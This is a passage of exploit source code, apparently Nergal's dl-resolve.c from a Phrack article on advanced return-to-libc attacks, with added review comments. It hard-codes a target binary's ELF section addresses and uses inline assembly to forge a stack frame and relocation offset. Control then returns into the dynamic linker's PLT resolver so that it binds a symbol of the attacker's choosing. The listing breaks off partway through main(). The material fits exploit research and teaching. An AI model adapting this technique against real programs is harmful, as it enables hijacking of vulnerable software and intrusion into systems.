Advanced Return to libc Exploits
phrack-nergal/dl-resolve.c !d5fc32b7<br />
/* by Nergal */<br />
/*
 * NOTE(review): the header names were stripped by the page extraction
 * (four bare "#include" lines survived). stdlib.h and elf.h are required by
 * the visible code (exit()/malloc(), Elf32_Rel/Elf32_Sym); stdio.h and
 * string.h are the remaining two usually present in this file -- confirm
 * against the rest of main().
 */
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Addresses inside the target binary that the technique depends on. They
 * are specific to one build of the target: every value below has to be
 * re-read from the ELF actually being attacked before this code is reused.
 * From the names, STRTAB/SYMTAB/JMPREL/VERSYM presumably mirror the
 * DT_STRTAB, DT_SYMTAB, DT_JMPREL and DT_VERSYM entries of its dynamic
 * section -- confirm against the target.
 */
#define STRTAB 0x8048240
#define SYMTAB 0x8048170
#define JMPREL 0x8048354
#define VERSYM 0x80482f8
/*
 * Kept as a string, not a number: doit() splices it into its inline-asm
 * template by string-literal concatenation ("pushl $" PLT_SECTION) and then
 * `ret`s to it, so this is the code address control is handed to.
 */
#define PLT_SECTION "0x080483cc"
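/*
 * Landing pad for the forged call set up in doit(): doit() pushes this
 * function's address (via its "b"(graceful_exit) operand) as the saved
 * return address of the frame it builds, so presumably the function the
 * dynamic linker ends up binding returns here once it is done.
 *
 * Terminates the process with a fixed, recognizable status (123) instead of
 * letting execution fall off into whatever lies below the forged frame.
 *
 * Declared with a proper prototype: the original `()` form is an old-style
 * declaration that disables argument checking.
 */
void graceful_exit(void)
{
	exit(123);
}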
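/*
 * Hand control to the address in PLT_SECTION with an attacker-chosen
 * relocation offset on top of the stack.
 *
 * offset  value delivered in %eax (the "0"(offset) constraint ties it to the
 *         output operand) and pushed immediately below the PLT_SECTION
 *         address, where a PLT stub would normally leave its reloc offset.
 *
 * The asm builds, bottom to top, the frame that whatever the linker binds
 * will see when it runs:
 *
 *   six dwords           0x01011000, 0xffffffff, 0x32, 0x7, 0x01011000, 0xaa011000
 *                        (presumably the bound function's arguments --
 *                        deepest push = last argument)
 *   return address       graceful_exit (loaded into %ebx by the constraint)
 *   relocation offset    %eax (= offset)
 *   PLT_SECTION address  consumed by the final `ret`, which jumps there
 *
 * Control never comes back here: the final `ret` leaves %esp pointing into
 * the forged frame, so nothing after the asm statement executes; `res` only
 * exists to give the "=a" output operand a home.
 *
 * i386-only (pushl, %eax/%ebx) and bound to one target binary through
 * PLT_SECTION and the hard-coded argument constants.
 *
 * Fix relative to the original listing: the asm template was one string
 * literal spanning several physical lines, which modern compilers reject
 * (unterminated string); it is now one literal per instruction, joined by
 * adjacent-literal concatenation, with identical assembler output.
 */
void doit(int offset)
{
	int res;

	__asm__ volatile (
		"pushl $0x01011000\n\t"
		"pushl $0xffffffff\n\t"
		"pushl $0x00000032\n\t"
		"pushl $0x00000007\n\t"
		"pushl $0x01011000\n\t"
		"pushl $0xaa011000\n\t"
		"pushl %%ebx\n\t"            /* return address: graceful_exit */
		"pushl %%eax\n\t"            /* relocation offset */
		"pushl $" PLT_SECTION "\n\t" /* target of the ret below */
		"ret"
		: "=a"(res)
		: "0"(offset), "b"(graceful_exit)
	);

	(void)res; /* unreachable: the asm above does not return */
}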
/*
 * Forged relocation entry. Kept at file scope rather than on main()'s stack
 * -- presumably so that its address is fixed and known, since the code that
 * fills it in and hands its address to the linker lies past the end of this
 * excerpt; confirm against the rest of main().
 */
Elf32_Rel reloc;
/* Filler byte for fields whose value does not matter. */
#define ANYTHING 0xfe
/* Size of the scratch buffer main() malloc()s (`tmp`) to stage the fake tables in. */
#define RQSIZE 60000
int<br />
main(int argc, char **argv)<br />
{<br />
unsigned int reloc_offset;<br />
unsigned int real_index;<br />
char symbol_name[16];<br />
int dummy_writable_int;<br />
char *tmp = malloc(RQSIZE);<br />
Elf32_Sym *sym;<br />
unsigned short *null_short = (unsigned short*) tmp;<br />
/* create a null index into VERSYM */